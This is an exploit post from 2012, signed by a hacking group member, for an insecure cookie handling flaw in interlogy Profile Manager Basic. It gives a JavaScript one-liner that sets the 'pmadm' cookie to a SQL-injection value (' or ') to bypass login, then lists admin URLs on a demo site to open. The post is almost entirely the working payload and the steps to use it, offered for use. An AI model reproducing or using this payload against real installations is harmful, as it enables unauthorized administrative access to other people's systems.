[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling
Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: zer03s
[~]
[~] Date: 03/05/2012
[~]
[~] Home: zer03s.blog.com
[~]
[~] -----------------------------------------------------------

desc:

normal login for cookie

pmadm=dGVzdA;

if ı do this:

pmadm=dGVzd(write any thing);

example:

pmadm=dGVzdz;

or

pmadm=dGVzd123231212313;

not login

if ı do wthis:

pmadm=dGVzd ' or ';

boom this loggin :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

after you go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

[~]----------------------------------------------------------------------
[~] Greetz tO: all member blackc0de
[~]----------------------------------------------------------------------